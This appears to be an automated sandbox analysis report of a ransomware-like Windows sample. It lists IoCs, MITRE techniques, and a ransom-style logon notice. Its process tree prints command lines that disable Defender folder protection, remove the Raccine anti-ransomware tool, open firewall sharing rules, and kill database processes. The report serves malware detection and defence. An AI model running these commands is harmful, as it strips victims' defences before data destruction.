2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
130s
max time network
144s
platform
windows7_x64
resource
win7v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Size

346KB
MD5

aff561dee3b750728a4f2f8681cc252c
SHA1

f3a3ee6042c819ae00d028437c5f02ebefe0eb08
SHA256

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454
SHA512

6b73be255c3616dedb8c5c37254729526412967e886f3aa27038dfadb268efeb048ef3099575e4214b797c6fd555e2bcddb5f6c7b890903d0c6ca3b5b948d847

Score

10^/10

discovery evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 15 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
1028	icacls.exe
560	icacls.exe
788	icacls.exe
108	icacls.exe
1224	icacls.exe
280	icacls.exe
1756	icacls.exe
1664	icacls.exe
576	icacls.exe
1936	icacls.exe
584	icacls.exe
1236	icacls.exe
1540	icacls.exe
368	icacls.exe
568	icacls.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Здравствуйте."	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Случилась неприятность?\r\n\r\nНаши IT специалисты помогут Вам решить проблему.\r\n\r\nНапишите на email - [email protected]\r\n\r\n(c)IML Быстро. Качественно. Надежно."	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1620	taskkill.exe
1544	taskkill.exe
368	taskkill.exe
548	taskkill.exe
280	taskkill.exe
1896	taskkill.exe
316	taskkill.exe
1012	taskkill.exe
1700	taskkill.exe
336	taskkill.exe
1256	taskkill.exe
280	taskkill.exe
1596	taskkill.exe
1000	taskkill.exe
1700	taskkill.exe
1720	taskkill.exe
1844	taskkill.exe
1616	taskkill.exe
1316	taskkill.exe
1908	taskkill.exe
524	taskkill.exe
336	taskkill.exe
792	taskkill.exe
1456	taskkill.exe
336	taskkill.exe
1756	taskkill.exe
1472	taskkill.exe
516	taskkill.exe
1716	taskkill.exe
1456	taskkill.exe
1588	taskkill.exe
368	taskkill.exe
1720	taskkill.exe
108	taskkill.exe
1488	taskkill.exe
632	taskkill.exe
780	taskkill.exe
1612	taskkill.exe
1164	taskkill.exe
1988	taskkill.exe
868	taskkill.exe
396	taskkill.exe
1596	taskkill.exe
1064	taskkill.exe
1324	taskkill.exe
436	taskkill.exe
240	taskkill.exe
1668	taskkill.exe
1540	taskkill.exe
788	taskkill.exe
604	taskkill.exe
1908	taskkill.exe
1696	taskkill.exe
1164	taskkill.exe
672	taskkill.exe
1844	taskkill.exe
928	taskkill.exe
1764	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

752 reg.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

524 PING.EXE
1480 PING.EXE
1700 PING.EXE

pid	process
752	reg.exe

pid	process
524	PING.EXE
1480	PING.EXE
1700	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

pid	process
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 62 IoCs

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exetaskkill.exepowershell.execonhost.execonhost.exetaskkill.exetaskkill.exenetsh.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execonhost.exePING.EXEtaskkill.exemountvol.execonhost.exetaskkill.execonhost.exetaskkill.exemountvol.exetaskkill.exetaskkill.execonhost.execonhost.exePING.EXEtaskkill.exetaskkill.exetaskkill.execonhost.execonhost.exetaskkill.exetaskkill.execonhost.exenetsh.exetaskkill.execmd.exetaskkill.exetaskkill.exemountvol.exetaskkill.exearp.execonhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Token: SeDebugPrivilege	1720	conhost.exe
Token: SeDebugPrivilege	1620	conhost.exe
Token: SeDebugPrivilege	604	taskkill.exe
Token: SeDebugPrivilege	1896	taskkill.exe
Token: SeDebugPrivilege	1844	netsh.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	396	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	1668	conhost.exe
Token: SeDebugPrivilege	524	PING.EXE
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	928	mountvol.exe
Token: SeDebugPrivilege	792	conhost.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	280	conhost.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	548	mountvol.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1316	conhost.exe
Token: SeDebugPrivilege	632	conhost.exe
Token: SeDebugPrivilege	1700	PING.EXE
Token: SeDebugPrivilege	1720	conhost.exe
Token: SeDebugPrivilege	1472	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	780	taskkill.exe
Token: SeDebugPrivilege	516	conhost.exe
Token: SeDebugPrivilege	788	conhost.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	436	taskkill.exe
Token: SeDebugPrivilege	240	conhost.exe
Token: SeDebugPrivilege	1544	netsh.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1844	netsh.exe
Token: SeDebugPrivilege	1616	cmd.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	108	taskkill.exe
Token: SeDebugPrivilege	1764	mountvol.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1000	arp.exe
Token: SeDebugPrivilege	336	taskkill.exe
Token: SeDebugPrivilege	1700	PING.EXE
Token: SeDebugPrivilege	1256	conhost.exe
Token: SeDebugPrivilege	868	taskkill.exe
Token: SeDebugPrivilege	368	taskkill.exe
Token: SeDebugPrivilege	1908	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	1488	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	280	conhost.exe
Token: SeDebugPrivilege	672	taskkill.exe
Token: SeDebugPrivilege	1348	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

description	pid	process	target process
PID 308 wrote to memory of 1256	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1256	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1256	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1768	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1768	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1768	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	powershell.exe
PID 308 wrote to memory of 1720	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1720	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1720	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 280	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 280	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 280	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 752	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	reg.exe
PID 308 wrote to memory of 752	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	reg.exe
PID 308 wrote to memory of 752	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	reg.exe
PID 308 wrote to memory of 1164	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1164	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1164	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 516	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 516	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 516	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 576	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 576	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 576	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 780	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 780	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 780	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1316	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1316	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1316	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 524	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 524	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 524	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 1700	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 1700	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 1700	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	PING.EXE
PID 308 wrote to memory of 1756	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1756	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1756	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1584	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1584	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1584	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1596	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1596	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1596	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1056	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1056	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1056	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1896	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1896	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1896	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1620	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1620	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 1620	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	conhost.exe
PID 308 wrote to memory of 604	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 604	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 604	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1988	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1988	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1988	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe
PID 308 wrote to memory of 1844	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	netsh.exe
PID 308 wrote to memory of 1844	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	netsh.exe
PID 308 wrote to memory of 1844	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	netsh.exe
PID 308 wrote to memory of 336	308	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Здравствуйте."	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Случилась неприятность?\r\n\r\nНаши IT специалисты помогут Вам решить проблему.\r\n\r\nНапишите на email - [email protected]\r\n\r\n(c)IML Быстро. Качественно. Надежно."	0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe"
1⤵
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
  2⤵
  PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1768
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  PID:1720
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:280
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:752
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1164
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:516
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:780
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:576
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1316
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:524
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1584
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1756
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1700
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:1596
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:1056
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1896
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:604
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:1620
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:1988
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:1844
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
